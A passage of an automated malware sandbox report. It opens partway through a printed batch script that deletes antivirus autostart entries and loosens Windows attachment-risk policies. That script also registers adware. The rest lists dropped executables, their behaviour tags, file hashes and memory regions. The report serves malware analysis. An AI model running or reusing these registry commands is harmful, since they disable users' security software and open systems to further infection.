/v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
-
C:\Users\Admin\AppData\Local\Temp\1520.exeC:\Users\Admin\AppData\Local\Temp\1520.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1520.exeC:\Users\Admin\AppData\Local\Temp\1520.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1A9F.exeC:\Users\Admin\AppData\Local\Temp\1A9F.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1DBD.exeC:\Users\Admin\AppData\Local\Temp\1DBD.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 7322⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 7442⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 8442⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 8802⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 8722⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1F25.exeC:\Users\Admin\AppData\Local\Temp\1F25.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 7322⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 7442⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 8442⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 8802⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 8722⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Runtimebroker.exeMD5
46fd8caf1c1ff128c4d121d58a2e9306
SHA1f10607b0db63cf47e9fe8c01fc819e124349dc84
SHA256f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc
SHA5126307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540
-
C:\ProgramData\Runtimebroker.exeMD5
46fd8caf1c1ff128c4d121d58a2e9306
SHA1f10607b0db63cf47e9fe8c01fc819e124349dc84
SHA256f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc
SHA5126307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
c558fdaa3884f969f1ec904ae7bbd991
SHA1b4f85d04f6bf061a17f52c264c065b786cfd33ff
SHA2563e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e
SHA5126523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
89f684ecf3d2ed9901b573992a5145c6
SHA1d43fbd341f4e25d0b2b2a63811aba43090af3dd8
SHA256856be63c448e9c2283cc4e3efe469d057db1408f1c729d09d6c421d834ce08fe
SHA512a16c1be1504869cee9e0be6093e7e0731cd27ee35514b9ce5d2a3fa77360db6f3245d0e9c29df36db4b8e118378af46e12c9e887e3d1fbf66b940cd01db591d6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
27872b8b0dc195f9d65a5c1fea5e2395
SHA1b1fed06a9d9804016dd94e3ab7cc721ca5e50f56
SHA256d0a8f7f3cca87ef0104f833db9b298e20b53b3c6fe949f23070d9daf24c0b792
SHA512497b8492d50a8387467dd82e7d24a03d48e745db9650cfe2bbf472bfb13dc14618206b44fa8e3c1d1c5f6cb6fde718461077c23222ccb16a6da4fd0d6532ab7b
-
C:\Users\Admin\AppData\Local\Temp\1389.exeMD5
46fd8caf1c1ff128c4d121d58a2e9306
SHA1f10607b0db63cf47e9fe8c01fc819e124349dc84
SHA256f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc
SHA5126307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540
-
C:\Users\Admin\AppData\Local\Temp\1389.exeMD5
46fd8caf1c1ff128c4d121d58a2e9306
SHA1f10607b0db63cf47e9fe8c01fc819e124349dc84
SHA256f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc
SHA5126307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540
-
C:\Users\Admin\AppData\Local\Temp\1520.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\1520.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\1520.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\1A9F.exeMD5
68279fe4e69442ca2124d0758006a807
SHA17436d34654cee80938331ca13d90d7664e43ae94
SHA2569cafdd248a2ff56d3eecf414762b5d98b2d4583974ed66412b276177de3d674a
SHA5127bde7ae6d10cd2aa5deb854ad943e92db6b9ed27360337fd87f7646f6f4a356f94d6430f7ec2f0b352ec401d43dbd4e11cfbdb93c81058481b8389f521d2811d
-
C:\Users\Admin\AppData\Local\Temp\1A9F.exeMD5
68279fe4e69442ca2124d0758006a807
SHA17436d34654cee80938331ca13d90d7664e43ae94
SHA2569cafdd248a2ff56d3eecf414762b5d98b2d4583974ed66412b276177de3d674a
SHA5127bde7ae6d10cd2aa5deb854ad943e92db6b9ed27360337fd87f7646f6f4a356f94d6430f7ec2f0b352ec401d43dbd4e11cfbdb93c81058481b8389f521d2811d
-
C:\Users\Admin\AppData\Local\Temp\1DBD.exeMD5
4fb208ec7d17d1ba04dd724693231c5e
SHA1d2861fd7a1463d5bbbf6154d7c82d4dbff6112d5
SHA2566dfc2d77895bc8653a3a5ef24b97484ace1f716231abd88045e9e08fea2bd449
SHA512172aa75c8d4737e91d611af37bfeaa2ad4063f7a9d630215161db32a384d71d8852bbf7114369d8a886ad7eb966b20661e40db1599733e23da393bcfd04692a6
-
C:\Users\Admin\AppData\Local\Temp\1DBD.exeMD5
4fb208ec7d17d1ba04dd724693231c5e
SHA1d2861fd7a1463d5bbbf6154d7c82d4dbff6112d5
SHA2566dfc2d77895bc8653a3a5ef24b97484ace1f716231abd88045e9e08fea2bd449
SHA512172aa75c8d4737e91d611af37bfeaa2ad4063f7a9d630215161db32a384d71d8852bbf7114369d8a886ad7eb966b20661e40db1599733e23da393bcfd04692a6
-
C:\Users\Admin\AppData\Local\Temp\1F25.exeMD5
a14a03079bb9c9fcf9bc1877cd82b9e3
SHA1e078ad048beeb0f0b9dc2703073a345f7c04f5f7
SHA256ad85ec8bf87669cfc6f874e6fc4def4349ac8dabfdde8976cd90298ae24b6ce9
SHA5129a75763ecf168e6c25980e0c37e0bc1a91cdf41dd9f256d09f9c56b186d07dd556513b343930d704776387af8723dc5137df445c7de0e8705a6e7b0268feaee1
-
C:\Users\Admin\AppData\Local\Temp\1F25.exeMD5
a14a03079bb9c9fcf9bc1877cd82b9e3
SHA1e078ad048beeb0f0b9dc2703073a345f7c04f5f7
SHA256ad85ec8bf87669cfc6f874e6fc4def4349ac8dabfdde8976cd90298ae24b6ce9
SHA5129a75763ecf168e6c25980e0c37e0bc1a91cdf41dd9f256d09f9c56b186d07dd556513b343930d704776387af8723dc5137df445c7de0e8705a6e7b0268feaee1
-
memory/632-114-0x0000000002D60000-0x0000000002EAA000-memory.dmpFilesize
1.3MB
-
memory/684-162-0x0000000000000000-mapping.dmp
-
memory/684-172-0x0000000000400000-0x0000000002C84000-memory.dmpFilesize
40.5MB
-
memory/684-170-0x0000000002C90000-0x0000000002D3E000-memory.dmpFilesize
696KB
-
memory/768-121-0x0000000000000000-mapping.dmp
-
memory/768-212-0x0000000005180000-0x00000000051A1000-memory.dmpFilesize
132KB
-
memory/768-134-0x0000000004FA0000-0x0000000004FA1000-memory.dmpFilesize
4KB
-
memory/768-127-0x0000000005400000-0x0000000005401000-memory.dmpFilesize
4KB
-
memory/768-150-0x0000000004F40000-0x0000000004F41000-memory.dmpFilesize
4KB
-
memory/768-125-0x0000000000590000-0x0000000000591000-memory.dmpFilesize
4KB
-
memory/768-146-0x0000000002B60000-0x0000000002B61000-memory.dmpFilesize
4KB
-
memory/1216-154-0x0000000000400000-0x0000000002CB1000-memory.dmpFilesize
40.7MB
-
memory/1216-147-0x0000000004970000-0x0000000004A03000-memory.dmpFilesize
588KB
-
memory/1216-132-0x0000000000000000-mapping.dmp
-
memory/1488-183-0x00000000008D0000-0x00000000008D9000-memory.dmpFilesize
36KB
-
memory/1488-181-0x0000000000000000-mapping.dmp
-
memory/1488-182-0x00000000008E0000-0x00000000008E5000-memory.dmpFilesize
20KB
-
memory/1820-179-0x0000000000140000-0x0000000000144000-memory.dmpFilesize
16KB
-
memory/1820-177-0x0000000000000000-mapping.dmp
-
memory/1820-180-0x0000000000130000-0x0000000000139000-memory.dmpFilesize
36KB
-
memory/2044-118-0x0000000000000000-mapping.dmp
-
memory/2044-131-0x0000000000400000-0x0000000002C84000-memory.dmpFilesize
40.5MB
-
memory/2044-124-0x0000000002D10000-0x0000000002E5A000-memory.dmpFilesize
1.3MB
-
memory/2060-174-0x0000000000000000-mapping.dmp
-
memory/2060-178-0x00000000003D0000-0x00000000003DC000-memory.dmpFilesize
48KB
-
memory/2060-176-0x00000000003E0000-0x00000000003E6000-memory.dmpFilesize
24KB
-
memory/2080-157-0x0000000000AF0000-0x0000000000AFC000-memory.dmpFilesize
48KB
-
memory/2080-156-0x0000000000B00000-0x0000000000B07000-memory.dmpFilesize
28KB
-
memory/2080-152-0x0000000000000000-mapping.dmp
-
memory/2116-175-0x0000000000C70000-0x0000000000C79000-memory.dmpFilesize
36KB
-
memory/2116-173-0x0000000000C80000-0x0000000000C85000-memory.dmpFilesize
20KB
-
memory/2116-171-0x0000000000000000-mapping.dmp
-
memory/2168-222-0x0000000000400000-0x0000000000495000-memory.dmpFilesize
596KB
-
memory/2168-216-0x000000000044003F-mapping.dmp
-
memory/2168-215-0x0000000000400000-0x0000000000495000-memory.dmpFilesize
596KB
-
memory/2428-117-0x0000000000470000-0x0000000000486000-memory.dmpFilesize
88KB
-
memory/3188-116-0x0000000000402E1A-mapping.dmp
-
memory/3188-115-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/3196-169-0x0000000001010000-0x000000000101F000-memory.dmpFilesize
60KB
-
memory/3196-168-0x0000000001020000-0x0000000001029000-memory.dmpFilesize
36KB
-
memory/3196-167-0x0000000000000000-mapping.dmp
-
memory/3240-186-0x00000000004E0000-0x00000000004E9000-memory.dmpFilesize
36KB
-
memory/3240-185-0x00000000004F0000-0x00000000004F5000-memory.dmpFilesize
20KB
-
memory/3240-184-0x0000000000000000-mapping.dmp
-
memory/3296-160-0x0000000000000000-mapping.dmp
-
memory/3296-166-0x0000000000480000-0x000000000048B000-memory.dmpFilesize
44KB
-
memory/3296-165-0x0000000000490000-0x0000000000497000-memory.dmpFilesize
28KB
-
memory/3488-201-0x0000000007C90000-0x0000000007C91000-memory.dmpFilesize
4KB
-
memory/3488-198-0x0000000007E10000-0x0000000007E11000-memory.dmpFilesize
4KB
-
memory/3488-213-0x0000000009550000-0x0000000009551000-memory.dmpFilesize
4KB
-
memory/3488-237-0x0000000006F23000-0x0000000006F24000-memory.dmpFilesize
4KB
-
memory/3488-203-0x00000000086B0000-0x00000000086B1000-memory.dmpFilesize
4KB
-
memory/3488-199-0x0000000007E80000-0x0000000007E81000-memory.dmpFilesize
4KB
-
memory/3488-197-0x0000000007DA0000-0x0000000007DA1000-memory.dmpFilesize
4KB
-
memory/3488-187-0x0000000000000000-mapping.dmp
-
memory/3488-190-0x0000000004A00000-0x0000000004A01000-memory.dmpFilesize
4KB
-
memory/3488-191-0x0000000007560000-0x0000000007561000-memory.dmpFilesize
4KB
-
memory/3488-192-0x0000000006F20000-0x0000000006F21000-memory.dmpFilesize
4KB
-
memory/3488-193-0x0000000006F22000-0x0000000006F23000-memory.dmpFilesize
4KB
-
memory/3488-217-0x0000000009270000-0x0000000009271000-memory.dmpFilesize
4KB
-
memory/3488-214-0x00000000087B0000-0x00000000087B1000-memory.dmpFilesize
4KB
-
memory/3488-196-0x0000000007CC0000-0x0000000007CC1000-memory.dmpFilesize
4KB
-
memory/3748-143-0x0000000000000000-mapping.dmp
-
memory/3748-148-0x00000000008D0000-0x0000000000944000-memory.dmpFilesize
464KB
-
memory/3748-149-0x0000000000860000-0x00000000008CB000-memory.dmpFilesize
428KB
-
memory/3864-136-0x0000000000000000-mapping.dmp
-
memory/3864-155-0x0000000002D60000-0x0000000002EAA000-memory.dmpFilesize
1.3MB
-
memory/3864-159-0x0000000000400000-0x0000000002CB0000-memory.dmpFilesize
40.7MB
-
memory/4028-194-0x0000000006D00000-0x0000000006D01000-memory.dmpFilesize
4KB
-
memory/4028-158-0x0000000005740000-0x0000000005741000-memory.dmpFilesize
4KB
-
memory/4028-195-0x0000000007400000-0x0000000007401000-memory.dmpFilesize
4KB
-
memory/4028-145-0x0000000005790000-0x0000000005791000-memory.dmpFilesize
4KB
-
memory/4028-161-0x00000000059D0000-0x00000000059D1000-memory.dmpFilesize
4KB
-
memory/4028-144-0x0000000005D60000-0x0000000005D61000-memory.dmpFilesize
4KB
-
memory/4028-151-0x00000000057F0000-0x00000000057F1000-memory.dmpFilesize
4KB
-
memory/4028-142-0x00000000779F0000-0x0000000077B7E000-memory.dmpFilesize
1.6MB
-
memory/4028-128-0x0000000000000000-mapping.dmp
-
memory/4028-140-0x00000000008A0000-0x00000000008A1000-memory.dmpFilesize
4KB
-
memory/4028-207-0x00000000073B0000-0x00000000073B1000-memory.dmpFilesize
4KB
-
memory/4028-153-0x0000000005830000-0x0000000005831000-memory.dmpFilesize
4KB
-
memory/4136-238-0x0000000000E90000-0x0000000000E91000-memory.dmpFilesize
4KB
-
memory/4136-239-0x0000000000E92000-0x0000000000E93000-memory.dmpFilesize
4KB
-
memory/4136-245-0x00000000092B0000-0x00000000092B1000-memory.dmpFilesize
4KB
-
memory/4136-247-0x0000000000E93000-0x0000000000E94000-memory.dmpFilesize
4KB
-
memory/4136-248-0x0000000008DE0000-0x0000000008F3B000-memory.dmpFilesize
1.4MB
-
memory/4136-224-0x0000000000000000-mapping.dmp
-
memory/4136-233-0x0000000007520000-0x0000000007521000-memory.dmpFilesize
4KB
-
memory/4332-503-0x0000000000000000-mapping.dmp
-
memory/4364-258-0x0000000006A10000-0x0000000006A11000-memory.dmpFilesize
4KB
-
memory/4364-270-0x0000000008BE0000-0x0000000008C13000-memory.dmpFilesize
204KB
-
memory/4364-284-0x000000007E6D0000-0x000000007E6D1000-memory.dmpFilesize
4KB
-
memory/4364-286-0x0000000006A13000-0x0000000006A14000-memory.dmpFilesize
4KB
-
memory/4364-259-0x0000000006A12000-0x0000000006A13000-memory.dmpFilesize
4KB
-
memory/4364-249-0x0000000000000000-mapping.dmp